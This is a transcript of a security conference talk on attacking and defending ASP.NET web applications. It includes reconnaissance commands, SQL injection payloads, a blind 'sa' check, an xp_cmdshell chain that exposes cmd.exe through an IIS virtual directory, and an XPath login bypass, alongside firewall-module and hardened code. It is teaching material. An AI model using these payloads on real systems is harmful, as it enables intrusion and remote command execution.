Hacking and Securing .NET Apps (Infosecworld)


    Hacking and Securing .NET Apps (Infosecworld) - Presentation Transcript

    1. Session H4 Hacking and Securing .NET
    2. Introduction (Brief): Shreeraj Shah
       - Founder & Director, Net Square
       - Past experience: Chase, IBM & Foundstone
       - Interest: Web security research
       - Published: Advisories, Tools, Papers etc.
       - Book: Web Hacking
       - http://shreeraj.blogspot.com, shreeraj@net-square.com
    3. Agenda
       - Industry
       - Web Assets
       - Issues
       - Trends
       - TCP – 80/443
       - Technologies
       - .Net Application Attack points
       - Assessment Tools & Methodology
       - Auditing
       - Defending .Net (Controls)
       - .NET Security
    4. Agenda (repeated from slide 3)
    5. Industry
       - WEB 2.0 & Rich Internet Applications are on the rise
       - The Web Services framework is picking up
       - Web services would rocket from $1.6 billion in 2004 to $34 billion by 2007 [IDC]
       - The application layer is becoming critical for business success
       - Messaging mechanisms are changing
    6. Industry
       - Sample new applications: www.live.com, www.netvibes.com, www.writely.com, www.start.com, etc.
    7. Agenda (repeated from slide 3)
    8. Infrastructure Evolution - 1
       [Diagram: Internet – router – intranet (www, mail, Database)]
    9. Infrastructure Evolution - 2
       [Diagram: Internet and Other Offices – router – DMZ (www, mail, Exchange) – intranet (Database, VPN, RAS, Dial-up)]
    10. Infrastructure Evolution - 3
       [Diagram: as slide 9, with a firewall added in front of the DMZ]
    11. Defense posture and Evolution
       [Diagram: layers from bottom to top – Operating System Level (ipc$/wu-ftpd/sunrpc etc.), Services Level (IIS web/SMTP/POP etc.), Application Level (Web/customized etc.), Business Application Level (Web Services). Traditional Attacks: Brute force, RPC buffer overflow, Null session, etc.]
    12. Defense posture and Evolution
       [Diagram: same layers; perimeter defenses (Firewall, VPN, IDS, Auth Server etc.) block (X) the traditional attacks]
    13. Defense posture and Evolution
       [Diagram: Next Generation Attacks (SQL injection, Parameter tampering, etc.) reach the Application Level. Added Defense: Accounts/Shares/Patches/updates/Logging/Auditing/Ports/Registries etc.]
    14. Defense posture and Evolution
       [Diagram: an Application Layer Content Filtering Firewall is added in front of the Application Level and blocks (X) the next generation attacks]
    15. Defense posture and Evolution
       [Diagram: Web Services Attacks reach the Business Application Level behind the Application Layer Firewall]
    16. Defense posture
       [Diagram: Runtime Platform (Services and Components); Application Layer Logic: 1. Presentation, 2. Business, 3. Data Access; Host Security (Operating System); Network Security (Routers, Firewalls, Switches). Actors: Partner, Customer, User, Supplier, Hacker, Prospect, Employee]
    17. Evolution of Web applications
       [Diagram: Web Client – Internet – DMZ: Web Server (static pages only: HTML, HTM etc.) and Scripted Web Engine (dynamic pages: ASP, DHTML, PHP, CGI etc.) – Internal/Corporate: DB]
    18. Evolution of Web applications
       [Diagram: as slide 17, with a Trusted zone holding Application Servers (WebLogic, ColdFusion etc.) between the scripted engine and the DB]
    19. Evolution of Web applications
       [Diagram: as slide 18, with Middle layer Components (COM, Beans etc.) added in the Trusted zone]
    20. Evolution of Web applications
       [Diagram: the Scripted Web Engine and Application Servers become an Integrated Framework – ASP.NET with .Net, J2EE App Server, Web Services etc.]
    21. Evolution of Web applications
       [Diagram: as slide 20, with a SOAP Web Service Client alongside the Web Client, both entering through the Web Server]
    22. Technologies
       - Web Services are forming the back end and are accessible over SOAP
       - AJAX – empowering browsers
       - XML based services
       - Rich Internet Applications are consuming back end web services
       - Search engines and mechanisms for web services publishing and accessing
       - Security evolving around web services
    23. Technologies
       [Diagram: Web Client – simple GET/POST to an HTTP resource on the Web Server; simple AJAX calls to a Web Services resource; a Web Services Client to the same. Start.com DEMO]
    24. Agenda (repeated from slide 3)
    25. Security!
       - 95% of companies were hacked through web applications and only 5% of them were aware of it – FBI/CSI
       - The most popular attacks are against the web server – incident.org
       - 3 out of 4 web sites are vulnerable to attack (Gartner)
       - 75% of hacks occur at the application level (Gartner)
       - Every 1500 lines of code has one security vulnerability (IBM Labs)
       - 2000 attacks / week for an unprotected web site
    26. Security!
       - "Over 80% of all malicious attacks target port 80." - Network World
       [Bar chart (percentage scale 0–100): Services vulnerabilities, web server vulnerabilities, SQL injection, Cross-site scripting, Buffer overflows, Cookie poisoning, Parameter Tampering, others]
    27. Security!
       - CSI Security Survey: Vulnerability Distribution
       [Pie chart: programming errors 64%; misconfiguration, other problems 36%]
    28. Agenda (repeated from slide 3)
    29. Defining Methods
       - Black Box Method: Analyzing the application from an attacker's perspective. Seeing only the web resources available to a common user – e.g. what is reachable on ports 80 and 443.
       - White Box Method: Analyzing the application with full knowledge and access. Access to the deployment setup, source code and other resources which are on the box.
    30. Traditional - Application
       [Diagram: Phase 1 – Vulnerability Assessment of Internet Systems, Internal Systems and the Application; Phase 2 – Security Architecture review, Code / app review and Audit of Internet Systems, Internal Systems and App / DB; Phase 3 – lock-down of Internet Systems and Internal Systems, re-code / lock-down of App / DB; Phase 4 – Continuous Security Monitoring and Assessment]
    31. Analysis Cycle
       [Diagram: Deployment Analysis (White Box Approach) -> Application Analysis (Black Box Approach) -> Attacks Identification (Black Box Approach) -> Web Application Asset – Attacks Mapping -> Defense Strategies (White Box Approach)]
    32. Methodology
       - Footprinting -> Discovery -> Profiling -> Manual Attacks -> Auto Attacks -> Exploit -> Defense
    33. Footprinting & Discovery
       - The "Host" is essential – an IP/port combination is not enough
       - Old approaches: whois & PTR – may not work
       - New approaches: search engines, advanced whois databases
    34. Information Exposure
       - Multi-hosted scenario
       <VirtualHost *:80>
           # ServerAdmin webmaster@dummy-host.example.com
           DocumentRoot /usr/local/apache2/htdocs
           # ErrorLog logs/dummy-host.example.com-error_log
           # CustomLog logs/dummy-host.example.com-access_log common
       </VirtualHost>
       <VirtualHost *:80>
           # ServerAdmin webmaster@dummy-host.example.com
           DocumentRoot /usr/local/apache2/htdocs/blue
           ServerName www.blue.com
           # ErrorLog logs/dummy-host.example.com-error_log
           # CustomLog logs/dummy-host.example.com-access_log common
       </VirtualHost>
       <VirtualHost *:80>
           # ServerAdmin webmaster@dummy-host.example.com
           DocumentRoot /usr/local/apache2/htdocs/red
           ServerName www.red.com
           # ErrorLog logs/dummy-host.example.com-error_log
           # CustomLog logs/dummy-host.example.com-access_log common
       </VirtualHost>
    35. Information Exposure
       C:\Documents and Settings\Administrator> nc 203.88.128.10 80
       HEAD / HTTP/1.0

       HTTP/1.1 200 OK
       Date: Tue, 11 Jan 2005 20:17:40 GMT
       Server: Apache/2.0.50 (Unix) mod_ssl/2.0.50 OpenSSL/0.9.7d mod_jk2/2.0.4
       Content-Location: index.html.en
       Vary: negotiate,accept-language,accept-charset
       TCN: choice
       Last-Modified: Fri, 04 May 2001 00:01:18 GMT
       ETag: "1c4d0-5b0-40446f80;1c4e6-961-8562af00"
       Accept-Ranges: bytes
       Content-Length: 1456
       Connection: close
       Content-Type: text/html; charset=ISO-8859-1
       Content-Language: en
       Expires: Tue, 11 Jan 2005 20:17:40 GMT
    36. Information Exposure
       C:\Documents and Settings\Administrator> nc 203.88.128.10 80
       HEAD / HTTP/1.0
       Host: www.blue.com

       HTTP/1.1 200 OK
       Date: Tue, 11 Jan 2005 20:17:45 GMT
       Server: Apache/2.0.50 (Unix) mod_ssl/2.0.50 OpenSSL/0.9.7d mod_jk2/2.0.4
       Last-Modified: Tue, 04 Jan 2005 23:10:29 GMT
       ETag: "1865-b-f991a340"
       Accept-Ranges: bytes
       Content-Length: 11
       Connection: close
       Content-Type: text/html; charset=ISO-8859-1
    37. Information Exposure
       C:\Documents and Settings\Administrator> nc 203.88.128.10 80
       HEAD / HTTP/1.0
       Host: www.red.com

       HTTP/1.1 200 OK
       Date: Tue, 11 Jan 2005 20:17:57 GMT
       Server: Apache/2.0.50 (Unix) mod_ssl/2.0.50 OpenSSL/0.9.7d mod_jk2/2.0.4
       Last-Modified: Tue, 04 Jan 2005 23:16:57 GMT
       ETag: "1cc0b-9-10b20c40"
       Accept-Ranges: bytes
       Content-Length: 9
       Connection: close
       Content-Type: text/html; charset=ISO-8859-1
    38. Information Exposure
       C:\Program Files\GnuWin32\bin>jwhois -h whois.arin.net 203.88.128.10
       [Querying whois.arin.net]
       [whois.arin.net]
       OrgName:    XYZ corp
       OrgID:      XYZC
       Address:    101 First Avenue
       City:       NYC
       StateProv:  NY
       PostalCode: 94089
       Country:    US

       NetRange:   203.88.128.0 - 203.88.128.255
       CIDR:       203.88.128.0/20
       NetName:    XYZC-4
       NetHandle:  NET-203-88-128-0-1
       Parent:     NET-203-0-0-0-0
       NetType:    Direct Allocation
       NameServer: ns1.xyz.com
       NameServer: ns2.xyz.com
       Comment:
       RegDate:    2003-07-17
       Updated:    2003-07-17

       OrgTechHandle: NA098-ARIN
       OrgTechName:   Netblock Admin
       OrgTechPhone:  +1-212-999-9999
       OrgTechEmail:  netblockadmin@xyz.com

       # ARIN WHOIS database, last updated 2005-01-10 19:10
       # Enter ? for additional hints on searching ARIN's WHOIS database.

       C:\Program Files\GnuWin32\bin>
    39. Information Exposure
       C:\Documents and Settings\Administrator>nslookup
       Default Server:  ns1.icenet.net
       Address:  203.88.128.7

       > server ns1.xyz.com
       Default Server:  [203.88.128.250]
       Address:  203.88.128.250
       > 203.88.128.10
       Server:  [203.88.128.250]
       Address:  203.88.128.250

       Name:    www.blue.com
       Address:  192.168.7.50

       > set type=PTR
       > 203.88.128.10
       Server:  [203.88.128.250]
       Address:  203.88.128.250

       10.128.88.203.in-addr.arpa      name = www.blue.com
       10.128.88.203.in-addr.arpa      name = www.red.com
       >
       [Annotation on slide: "Bingo!" next to the www.blue.com answer]
    40. Information Exposure
       C:\Documents and Settings\Administrator>nslookup
       Default Server:  ns1.icenet.net
       Address:  203.88.128.7

       > server 203.88.128.250
       Default Server:  icedns1.icenet.net
       Address:  203.88.128.250
       > 203.88.128.11
       Server:  icedns1.icenet.net
       Address:  203.88.128.250

       Name:    ice.128.client11.icenet.net
       Address:  203.88.128.11

       > set type=PTR
       > 203.88.128.11
       Server:  icedns1.icenet.net
       Address:  203.88.128.250

       Non-authoritative answer:
       11.128.88.203.in-addr.arpa      name = ice.128.client11.icenet.net
       > 203.88.128.11
       Server:  icedns1.icenet.net
       Address:  203.88.128.250

       Non-authoritative answer:
       11.128.88.203.in-addr.arpa      name = ice.128.client11.icenet.net
       [Annotation on slide: "Sucks!" next to the generic ice.128.client11.icenet.net answer]
    41. Information Exposure
       - http://whois.webhosting.info/IP – Bingo!
       - www.whois.sc
    42. Search Engine Kung-Fu
       - Domain & cross-domain footprinting
       - MSN & Google can help:
         - "site:" – domain harvesting
         - "link:" (Google) & "linkdomain:" (MSN) – cross-domain harvesting
         - "inurl:" – filtering
         - "IP:" (MSN) – host footprinting
       - Advanced methods of footprinting
       - MSNPawn tool – http://net-square.com/msnpawn – DEMO
    43. Profile
       - Profiling the web application is a very important task for identifying possible attacks.
       - AJAX and web services calls
       - The objective is to find out: where do we get a cookie? Where are the forms? Does it have applets or objects? Are query strings around or not? And so on.
       - Regex can be used on the HTML code to fetch this info.
    44. Sample Profile
       [Table: each URL (asset) marked (X) against the attributes Form, Cmnt, Email, Applet, Object, Cookie, Auth., Path, Script, QryStr. URLs profiled: /, /cart.aspx, /include/styles.css, /privacy.aspx, /catalog.aspx, /aboutus.aspx, /details.aspx?id=1, /details.aspx?id=2, /details.aspx?id=3, /details.aspx?id=4, /details.aspx?id=5, /details.aspx?id=6, /rebates.aspx, /catalog.aspx?start=3, /catalog.aspx?start=6, /rebates.aspx?loc=beckham.html, /rebates.aspx?loc=zhivago.html, /rebates.aspx?loc=monsoon.html, /rebates.aspx?loc=lawrence.html, /orderapp/default.aspx?login=yes, /orderapp/include/styles.css. DEMO]
    45. Web Application Assets
       - Each identified attribute can have a vulnerability.
       - A vulnerability can be exploited by a hacker.
       - Forms and query strings are the major source of exploitation.
       - Other parameters like cookies, scripts (client side Java, VB etc.) and path info (include, cgi-bin, servlet etc.) expose business level information.
    46. Once again public domain usage
       - We can fetch this info from the public domain, e.g. Google – "site:"
       - We can fetch technology clues using "inurl" or "filetype"
       - One can fetch "cache" information from Google and profile it as well.
       - Can be fetched from www.archive.org: http://web.archive.org/web/*www.google.com* DEMO
    47. Search Engine Kung-Fu
       - Profiling & fetching a list of URLs – "site:"
       - Advantage: passive & one-shot harvesting
       - Technology identification from the search engine
       - Vulnerability and resource leakage analysis from the engine
       - MSNPawn for MSN hacking – Google hacking tools – DEMO
    48. Agenda (repeated from slide 3)
    49. Deployment Attack Points
       [Diagram over the web application stack of slide 19: Configuration, Permission, Backup files, Config files, Reverse Proxy, Ext. Mapping, Dir Browsing, Common files (Web Server), Integration files, Hidden web paths, WEB-INF etc., Cross site trace; at the DB: Roles, Extended SPs. DEMO]
    50. Deployment Analysis for .Net
       - Scanning *.config files
       - Understanding the mapping
       - Directory browsing and other permission checks
       - Metadata can help in automated scanning on .Net
       - DEMO Code Walk
    51. Agenda (repeated from slide 3; current item: .Net Application Attacks)
    52. Exposure to asset
       [Diagram: Attack Tools & Agents, Technique & Methods, Motives and Goals on the attacker's side; Security Controls and Policies, Vulnerability and Exploit in front of the Asset; an exploit of a poor control reaches the asset]
    53. Impact Trail – Form / Query String
       [Diagram over the web application stack: client side processing at the Web Client, parameter processing at the Web Server / Scripted Web Engine, variable processing at the Application Servers, query processing at the DB]
    54. Impact Trail – Form / Query String
       c:\tools>nc <HOST> 80
       GET /account.aspx?id=5 HTTP/1.0
       …
       [Same diagram as slide 53, annotated with this GET request]
    55. Impact Trail – Form / Query String
       c:\tools>nc <HOST> 80
       POST /account.aspx HTTP/1.0
       …
       Id=5&customer=6
       [Same diagram as slide 53, annotated with this POST request]
    56. Impact Trail – Comments / Email
       [Diagram over the web application stack: information usage at the Web Client]
    57. Impact Trail – Comments / Email
       ….. <a HREF="mailto:admin@example.com">...
       …. <!-- code in db.inc changed 12/12/2002 by John --> ….
       [Same diagram as slide 56, annotated with these HTML fragments]
    58. Impact Trail – Applet / Object
       [Diagram over the web application stack: client side processing at the Web Client, data processing on the server side]
    59. Impact Trail – Applet / Object
       ….. <applet codebase=./code/> … </applet>
       …. <object classid=5672….></object>
       [Same diagram as slide 58, annotated with these fragments]
    60. Impact Trail – Cookie
       HTTP/1.x 200 OK
       ….
       Set-Cookie: ASPSESSIONIDCSSBBRQR=MKELONCBPANNHEKHCFGABJGB; CID=1
       [Diagram: Session Cookie and Application Cookie; client side session usage, session decision and session management on the server side; transport layer state]
    61. Impact Trail – Authentication
       [Diagram: client side processing at the Web Client, ACL control and ACL based decisions on the server side, data access based on ACL at the DB]
    62. Impact Trail – Authentication
       - Form based (user/pass)
       - NTLM/BASIC/DIGEST etc…
       [Same diagram as slide 61]
    63. Asset – Impact Observations
       [Table: logic layers Presentation, Business and Data Access marked (X) against the attributes Form, Cmnt, Email, Applet, Object, Cookie, Auth., Path, Script, QryStr]
    64. Asset to Attack Mapping
       [Table: attack classes marked (X) against the same attributes. Attack classes: Input Validation, Authorization, Parameter Tampering, Authentication, Brute Forcing, Session Management, SQL Manipulation, File Operations, Information Leakage, Error/Exception management, Client Side Manipulation, Java Decompile, Cryptography, Buffer Overflows, Remote Command Execution]
    65. Source Code Disclosure
       - Ability to retrieve application files in an unparsed manner.
       - Attackers can recover the source code of the web application itself.
       - The code can then be used to find further loopholes / trophies.
       - May be caused in many ways: misconfiguration or vendor errors, poor application design, etc.
    66. Input Validation
       - Root cause of most web hacks.
       - All inputs received should be validated: data types, data ranges (e.g. negative or fractional numbers), buffer sizes and bounds, metacharacters
       - Tampering with hidden fields.
       - Bypassing client side checking (e.g. JavaScript).
    67. Data types and HTTP
       - In HTTP, everything is a string.
       - Assign a data type to each parameter.
       - Basic data types: integer, string, date, floating point, etc.
       - Complex data types: file path, session identifier, credentials, etc.
    68. SQL Query Poisoning
       - Parameters from the URL or input fields get used in SQL queries.
       - An instance of Input Validation attacks.
       - Data can be altered to extend the SQL query: http://server/query.asp?item=3+OR+1=1
       - Execution of stored procedures.
       - May even lead to back-end database server compromise.
    69. Force SQL errors
       - Insert meta-characters around or within the parameters.
       - Range testing - BOF or EOF.
       - Changing the data type.
       - Premature query termination: quotation marks (' or "), trailing hyphens (--)
       - Look for error messages generated by the database.
    70. Identifying SQL errors
       - Try and force error messages from database servers.
       - Gives us an idea how the SQL query is being created and used.
       - Tamper with the input parameter: change the data type, premature termination by ' " etc…
       - If the SQL query fails, we have a candidate for SQL injection.
    71. Identifying SQL errors
       - Identify which resources contain SQL interfaces.
       - Identify the offending parameters which cause the SQL queries to break.
       - The root cause of all SQL query poisoning is lack of input sanitization.
       - Strip off meta-characters.
    72. Extend SQL queries
       - Add valid SQL clauses to extend the SQL query.
       - "OR 1=1" – return all rows.
       - ";SELECT …" – multiple queries.
       - ";EXEC …" – stored procedures.
    73. Executing Stored Procedures
       - SQL Injection attacks can be extended beyond excessive data retrieval.
       - Stored procedures, if known and accessible, can also be invoked. For example Microsoft SQL Server's extended stored procedures.
       - Use the SQL "EXEC" statement.
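As an added example (not code from the slides), the concatenation pattern the slides attack beside a hardened version: the parameter is first checked against its declared data type (slide 67) and then passed as a typed SqlParameter, so "3 OR 1=1" and ";EXEC …" never become part of the SQL text. The table and column names (items, id) are assumed; nothing here opens a database connection.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Added example, not from the slides. Both functions return the SqlCommand
// so the resulting text and parameters can be inspected; a caller with a
// real connection would set cmd.Connection and execute it.
public static class ItemQuery
{
    // Vulnerable: the raw "item" string becomes part of the SQL text.
    // item = "3 OR 1=1" yields "... WHERE id = 3 OR 1=1", i.e. every row.
    public static SqlCommand BuildUnsafe(string item)
    {
        return new SqlCommand("SELECT * FROM items WHERE id = " + item);
    }

    // Hardened: enforce the data type first, then bind a typed parameter.
    // The SQL text is constant, so no input can extend the query or append
    // a second statement such as ";EXEC ...".
    public static SqlCommand BuildSafe(string item)
    {
        int id;
        if (!int.TryParse(item, out id) || id < 0)
            throw new ArgumentException("item must be a non-negative integer");

        var cmd = new SqlCommand("SELECT * FROM items WHERE id = @id");
        cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
        return cmd;
    }

    public static void Main()
    {
        // Constructed inputs: a normal value and the two extension forms from slide 72.
        string[] inputs = { "3", "3 OR 1=1", "1;EXEC sp_who" };
        foreach (string input in inputs)
        {
            Console.WriteLine("unsafe : " + BuildUnsafe(input).CommandText);
            try
            {
                SqlCommand safe = BuildSafe(input);
                Console.WriteLine("safe   : " + safe.CommandText
                                  + "  @id=" + safe.Parameters["@id"].Value);
            }
            catch (ArgumentException ex)
            {
                Console.WriteLine("safe   : rejected (" + ex.Message + ")");
            }
        }
    }
}
```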
    74. SQL Injection
       - What if it is blind?
       - You don't know the web root
       - The firewall doesn't allow outbound traffic
       - If you know the web root – it is not providing write rights.
       - xp_cmdshell? - may or may not be working.
       - Is it running as "sa"?
    75. Making "sa" check…
       - Querying the process on SQL using SPs:
         (SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=115
       - The final query would be an "and":
         ?id=1+AND+(SELECT+ASCII(SUBSTRING((a.loginame),1,1))+FROM+master..sysprocesses+AS+a+WHERE+a.spid+=+@@SPID)=114
       - DEMO
    76. Pulling "winnt" out…
       - Echoing the following lines blindly using XP_CMDShell…
       Set WshShell = WScript.CreateObject("WScript.Shell")
       Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%")
       windir = ObjExec.StdOut.ReadLine()
       Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT")
       Set Dir = Root.Create("IIsWebVirtualDir", "secret")
       Dir.Path = windir
       Dir.AccessExecute = True
       Dir.SetInfo
    77. Echoing…
       - http://target/details.aspx?id=1;exec+master..xp_cmdshell+'echo Set WshShell = WScript.CreateObject("WScript.Shell") > c:\secret.vbs'
       - ….. And so on…. (All lines)
       - Now run the vbscript: http://target/details.aspx?id=1;exec+master..xp_cmdshell+'cscript+c:\secret.vbs'
       - Check http://target/secret/system32/cmd.exe?+/c+set
       - Bingo! DEMO
    78. With metasploit…
       [Screenshot only]
    79. XPATH Injection
       - XPATH is a language defined to find information in an XML document.
       - As the name suggests, XPATH uses a path to traverse the nodes of an XML document and look for specific information in the document.
       - XPATH provides expressions like slash (/), double slash (//), dot (.), double dot (..), @, =, <, > etc. They help in traversing the XML document.
    80. XPATH – Vulnerable Code
       // Vulnerable as shown on the slide: user and pass are concatenated into the XPath expression.
       // Requires references to System.Xml (XmlReader, XmlDocument) and Microsoft.Data.SqlXml (SqlXmlCommand).
       string fulltext = "";
       string coString = "Provider=SQLOLEDB;Server=(local);database=order;User ID=sa;Password=mypass";
       SqlXmlCommand co = new SqlXmlCommand(coString);
       co.RootTag = "Credential";
       co.CommandType = SqlXmlCommandType.Sql;
       co.CommandText = "SELECT * FROM users for xml Auto";
       XmlReader xr = co.ExecuteXmlReader();
       xr.MoveToContent();
       fulltext = xr.ReadOuterXml();
       XmlDocument doc = new XmlDocument();
       doc.LoadXml(fulltext);
       // user and pass arrive straight from the request
       string credential = "//users[@username='" + user + "' and @password='" + pass + "']";
       XmlNodeList xmln = doc.SelectNodes(credential);
       if (xmln.Count > 0)
       {
           // True: credentials accepted
       }
       else
       {
           // false: credentials rejected
       }
    81. Attacking XPATH point
       //users[@username='"+user+"' and @password='"+pass+"']";
       - XPATH parsing can be leveraged by passing the following string: ' or 1=1 or ''='
       - This will always be true on the first node and the user can get access as whoever the first user is.
       //users[@username='' or 1=1 or ''='' and @password='any']
       - Bingo! DEMO
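A hardened form of the slide's credential lookup, added here as an example (not code from the slides): the username and password are bound to XPath variables through a custom XsltContext instead of being concatenated, so the string ' or 1=1 or ''=' is compared as a literal username and matches nothing. The sample XML stands in for the "for xml Auto" output and is constructed for this example.

```csharp
using System;
using System.Collections.Generic;
using System.IO;
using System.Xml.XPath;
using System.Xml.Xsl;

// Added example, not from the slides. Resolves $name references in an XPath
// expression to values supplied from code; the expression text never changes.
public sealed class XPathVariableContext : XsltContext
{
    private readonly Dictionary<string, object> _vars = new Dictionary<string, object>();

    public XPathVariableContext(IDictionary<string, object> vars)
    {
        foreach (KeyValuePair<string, object> kv in vars)
            _vars[kv.Key] = kv.Value;
    }

    public override IXsltContextVariable ResolveVariable(string prefix, string name)
    {
        object value;
        if (!_vars.TryGetValue(name, out value))
            throw new XPathException("Unbound XPath variable: " + name);
        return new BoundVariable(value);
    }

    // No custom functions are exposed to the expression.
    public override IXsltContextFunction ResolveFunction(string prefix, string name, XPathResultType[] argTypes)
    {
        throw new XPathException("Functions are not allowed here: " + name);
    }

    public override int CompareDocument(string baseUri, string nextbaseUri) { return 0; }
    public override bool PreserveWhitespace(XPathNavigator node) { return false; }
    public override bool Whitespace { get { return false; } }

    private sealed class BoundVariable : IXsltContextVariable
    {
        private readonly object _value;
        public BoundVariable(object value) { _value = value; }
        public object Evaluate(XsltContext ctx) { return _value; }
        public bool IsLocal { get { return false; } }
        public bool IsParam { get { return false; } }
        public XPathResultType VariableType { get { return XPathResultType.String; } }
    }
}

public static class CredentialCheck
{
    // Constructed sample document in the shape the slide's query would return.
    private const string SampleXml =
        "<Credential>" +
        "<users username=\"alice\" password=\"s3cret\"/>" +
        "<users username=\"bob\" password=\"hunter2\"/>" +
        "</Credential>";

    public static bool IsValid(string user, string pass)
    {
        XPathDocument doc = new XPathDocument(new StringReader(SampleXml));
        XPathNavigator nav = doc.CreateNavigator();
        // Same predicate as the slide, with variables in place of concatenation.
        XPathExpression expr = nav.Compile("//users[@username=$u and @password=$p]");
        expr.SetContext(new XPathVariableContext(new Dictionary<string, object>
        {
            { "u", user },
            { "p", pass },
        }));
        return nav.Select(expr).Count > 0;
    }

    public static void Main()
    {
        Console.WriteLine(IsValid("alice", "s3cret"));
        Console.WriteLine(IsValid("' or 1=1 or ''='", "any"));
    }
}
```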
    82. Session Identifiers
       - The hash key - "session identifier"
       - A unique value for every session.
       - Passed back and forth between the browser and the server.
       - Implemented by a session cookie: PHP – PHPSESSID; ASP – ASPSESSIONID; JSP – jsessionid, etc.
    83. Session Identifiers
       - Non-sequenceable: should not be serially incremented.
       - Cryptographically generated: e.g. MD5(current time stamp + random salt); impossible to reverse-engineer.
       - It may be possible to change the session cookie value… but there is no way of guessing other session cookie values.
    84. AJAX hacking
       - AJAX – silent killer
       - Can fetch information from an SSL site
       - Dynamic execution of the script
       - XML object – fetching information
       - DEMO Code Walk
    85. Source Code Review
       - Analyzing source code
       - .NET – code analysis
       - Web application code review
       - What to look for?
       - How to grab the right information?
       - Let's see the demo and tools
       - DEMO Code Walk
    86. Binary audit
       - .NET application binary analysis
       - Important step
       - Look for key security information
       - How to analyze the binary?
       - What to look for?
       - Tools & Demo
       - DEMO Code Walk
    87. Agenda (repeated from slide 3)
    88. What is new in .Net?
       - A web application has a separate scope and the HTTP pipeline can be accessed.
       - ISAPI had some limitations which the HTTP interfaces do not have.
       - The HTTP request can be accessed before it hits application resources.
       - HTTPModule and HTTPHandler are the defense at your gates.
       - Can we build a web application firewall and IDS? – "YES"
    89. Web Application without defense
       [Diagram: Web Client – Internet – Corporate Firewall – DMZ: IIS Web Server with the Web Application Resource – Trusted / Internal/Corporate: DB]
    90. Web Application – Defense at gates
       [Diagram: as slide 89, with (1) a Web Application Firewall and (2) a Web Application IDS placed inside IIS in front of the Web Application Resource]
    91. HTTP Stack for .Net
       [Diagram: Client Request/Response -> IIS -> aspnet_isapi.dll -> HttpApplication with a chain of HttpModules -> HttpHandler -> Web Application Resource]
    92. HTTP Stack for .Net
       [Diagram: HttpRuntime -> HttpApplicationFactory -> HttpApplication (IHttpModule; HttpContext with HttpRequest and HttpResponse) -> HttpHandlerFactory -> IHttpHandler -> Handler]
    93. Leveraging
       - HTTPModule and HTTPHandler can be leveraged.
       - An application layer firewall can be cooked up for your application.
       - Similarly, an IDS for the web application can be developed.
       - It sits in the HTTP pipe and defends web applications.
    94. HTTP Stack for .Net
       [Diagram: as slide 92, with the Web Application Firewall & IDS placed at the IHttpModule stage between HttpApplicationFactory and HttpHandlerFactory]
    95. IHttpModule – Events
       - Capturing events when the HTTP request arrives.
    96. IHttpModule – Events
       - Capturing events when the HTTP response is about to go.
    97. IHttpModule – Events
       - Pre send events
    98. Initializing – Extending the Interface
       using System;
       using System.Web;
       using System.Text.RegularExpressions;

       namespace webfirewall
       {
           public class webfirewall : IHttpModule
           {
               // setPattern(), Init(), ProcessRequest() and Dispose() are shown on the following slides.

       NOTE: The sample code shown here is written in C#. You must create the project as a "Class Library", since you will be creating a .dll file that fits into the IIS HTTP processing chain or pipe. "System.Web" must be included as a reference assembly in the project. The IHttpModule interface resides in "System.Web".
    99. Regex Filtering capability
       - Adding regex filtering for incoming requests and parameters
       // Returns group `num` of every match of pattern `pat` in `doc` (case-insensitive).
       public string[] setPattern(string doc, string pat, int num)
       {
           Regex exp = new Regex(pat, RegexOptions.IgnoreCase);
           MatchCollection mc = exp.Matches(doc);
           string[] results = new string[mc.Count];
           for (int i = 0; i < mc.Count; i++)
           {
               Match FirstMatch = mc[i];
               results[i] = FirstMatch.Groups[num].Value;
           }
           return results;
       }
    100. Accessing HTTP stack
       - Creating the Application stack instance
       - Capturing the event for processing
       // Minimal form: subscribe to BeginRequest so every request passes through OnBeginRequest.
       public void Init(HttpApplication httpApp)
       {
           httpApp.BeginRequest += new EventHandler(this.OnBeginRequest);
       }
    101. Accessing HTTP stack
       - Firewall and IDS rules for GET and POST requests
       string[] query, post;

       public void Init(HttpApplication App)
       {
           App.BeginRequest += new EventHandler(this.ProcessRequest);
           // Rules file holds <QUERY>regex</QUERY> and <POST>regex</POST> entries.
           // Note: under IIS the worker process's current directory is generally not the
           // web application's directory; HttpRuntime.AppDomainAppPath is the usual choice.
           string inifile = Environment.CurrentDirectory + @"\firewallrules\config.ini";
           System.IO.StreamReader reader = new System.IO.StreamReader(inifile);
           string data = reader.ReadToEnd();
           reader.Close();
           query = setPattern(data, "<QUERY>(.*?)</QUERY>", 1);
           post = setPattern(data, "<POST>(.*?)</POST>", 1);
       }
    102. Example GET & POST
       http://192.168.131.3/dvds4less/details.aspx?id=1

       POST /dvds4less/checkout_form.aspx HTTP/1.1
       Host: 192.168.131.3
       User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.3) Gecko/20040910
       Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
       Accept-Language: en-us,en;q=0.5
       Accept-Encoding: gzip,deflate
       Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
       Keep-Alive: 300
       Connection: keep-alive
       Referer: http://192.168.131.3/dvds4less/cart.aspx?id=1&quantity=1
       Cookie: ASP.NET_SessionId=0zrvzp45nzb1sj45piri0f55
       Content-Type: application/x-www-form-urlencoded
       Content-Length: 60

       product_id_0=1&quantity_0=1&order_num=513745&submit=Checkout
       [Annotation on slide: "Attack points" – the query string (id=1) and the POST body parameters]
    103. Trapping HTTP request
        • Using ProcessRequest we can trap the incoming HTTP request.
        • Code for application defense can be plugged in there.

        // BeginRequest handler; the body continues on slides 104 to 106.
        public void ProcessRequest(object o, EventArgs ea)
        {
            HttpApplication app = (HttpApplication)o;
    104. Processing Query String
        • Defending the query string with the Regex routine

            // QUERY_STRING is the raw, still URL-encoded query; rules must either
            // account for encoded forms (e.g. %27 for a quote) or the value must be decoded first.
            string querystring = app.Request.ServerVariables["QUERY_STRING"];
            for (int j = 0; j < query.Length; j++)
            {
                string[] q = setPattern(querystring, query[j], 0);
                if (q.Length > 0)
                {
                    app.Response.Write("Security Error");
                    app.Response.End();
                }
            }
    105. Processing POST
        • Getting a hook to the POST request bytes.

            string postreq = "";
            if (app.Request.ServerVariables["REQUEST_METHOD"] == "POST")
            {
                long streamLength = app.Request.InputStream.Length;
